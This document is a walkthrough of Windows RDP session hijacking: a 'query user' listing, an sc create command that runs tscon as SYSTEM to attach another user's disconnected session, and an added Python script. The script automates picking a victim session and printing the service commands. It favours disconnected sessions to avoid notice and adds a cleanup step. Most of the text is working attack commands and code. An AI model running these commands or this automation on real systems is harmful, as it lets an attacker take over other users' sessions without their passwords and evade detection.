View users:

    C:\Windows\system32>query user
     USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
     administrator                             1  Disc            1  3/12/2017 3:07 PM
    >localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM
    C:\Windows\system32>

The row marked with `>` is the attacker's own session (localadmin on rdp-tcp#55); the target is administrator's disconnected (Disc) session, ID 1. Disconnected sessions keep no SESSIONNAME, which is why that column is blank.
Create the service:

    C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
    [SC] CreateService SUCCESS

Start the service. Creating a service needs local administrator rights, but the service itself runs as LocalSystem, and tscon run as SYSTEM attaches session 1 to the attacker's rdp-tcp#55 display without ever asking for administrator's password. The first argument to tscon is the session ID to take over; /dest: is the attacker's own session name.

Details:
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
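The steps above, automated as an added example (my code, not from the original post or from korznikov.com): it parses `query user` output by header column offsets, picks a disconnected session belonging to someone else, and emits the same sc create / net start commands, plus an sc delete to remove the service entry afterwards (the cleanup step is my addition). The sample output is constructed to match the listing above; the service name sesshijack and the tscon syntax are the page's own.

```python
"""Added example, not from the original post: parse `query user` output, pick a
disconnected session to hijack, and emit the tscon-as-a-service commands."""
import os
import subprocess
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample laid out like real `query user` output: fixed-width columns,
# the caller's own session marked with '>' in column 0, and an empty SESSIONNAME
# for the disconnected session (so splitting on whitespace would lose a column).
QUERY_USER_OUTPUT = (
    " USERNAME" + " " * 14 + "SESSIONNAME" + " " * 8 + "ID  STATE   IDLE TIME  LOGON TIME\n"
    + " administrator" + " " * 29 + "1  Disc" + " " * 12 + "1  3/12/2017 3:07 PM\n"
    + ">localadmin" + " " * 12 + "rdp-tcp#55" + " " * 10 + "2  Active" + " " * 10 + ".  3/12/2017 3:10 PM\n"
)

HEADER_FIELDS = ["USERNAME", "SESSIONNAME", "ID", "STATE", "IDLE TIME", "LOGON TIME"]


@dataclass
class Session:
    username: str
    session_name: Optional[str]  # None for disconnected sessions
    session_id: int
    state: str                   # "Active" or "Disc"
    idle: str
    logon: str
    current: bool                # True for the row marked with '>'


def parse_query_user(text: str) -> List[Session]:
    """Slice each row at the column offsets taken from the header line."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0]
    starts = [header.index(name) for name in HEADER_FIELDS]
    starts[0] = 0  # column 0 holds the '>' current-session marker
    sessions = []
    for line in lines[1:]:
        cells = []
        for i, start in enumerate(starts):
            end = starts[i + 1] if i + 1 < len(starts) else len(line)
            cells.append(line[start:end].strip())
        sessions.append(Session(
            username=cells[0].lstrip(">").strip(),
            session_name=cells[1] or None,
            session_id=int(cells[2]),
            state=cells[3],
            idle=cells[4],
            logon=cells[5],
            current=cells[0].startswith(">"),
        ))
    return sessions


def pick_hijack_target(sessions: List[Session], username: Optional[str] = None) -> Tuple[int, str]:
    """Return (target session ID, our own session name for /dest:).

    Only disconnected sessions are chosen: attaching an Active session
    disconnects whoever is using it and is noticed at once.
    """
    mine = next((s for s in sessions if s.current), None)
    if mine is None or mine.session_name is None:
        raise RuntimeError("could not find our own session name for /dest:")
    for s in sessions:
        if s.current or s.state != "Disc":
            continue
        if username is None or s.username.lower() == username.lower():
            return s.session_id, mine.session_name
    raise LookupError("no disconnected session to hijack")


def build_commands(target_id: int, dest: str, service_name: str = "sesshijack") -> List[str]:
    """Commands as in the post: the service runs as LocalSystem, and tscon run as
    SYSTEM attaches another user's session without that user's password."""
    binpath = f"cmd.exe /k tscon {target_id} /dest:{dest}"
    return [
        f'sc create {service_name} binpath= "{binpath}"',
        # net start reports a timeout because cmd.exe is not a real service
        # binary; tscon has already run by the time the error is printed.
        f"net start {service_name}",
        f"sc delete {service_name}",  # cleanup, added here; not in the post
    ]


def main() -> None:
    if os.name == "nt":
        text = subprocess.run(["query", "user"], capture_output=True, text=True, check=True).stdout
    else:
        text = QUERY_USER_OUTPUT  # offline: fall back to the constructed sample
    target_id, dest = pick_hijack_target(parse_query_user(text))
    for cmd in build_commands(target_id, dest):  # printed, not executed
        print(cmd)


if __name__ == "__main__":
    main()
```

On a Windows host the script reads the live `query user` output; elsewhere it falls back to the constructed sample. It only prints the commands, so running it does not create or start anything.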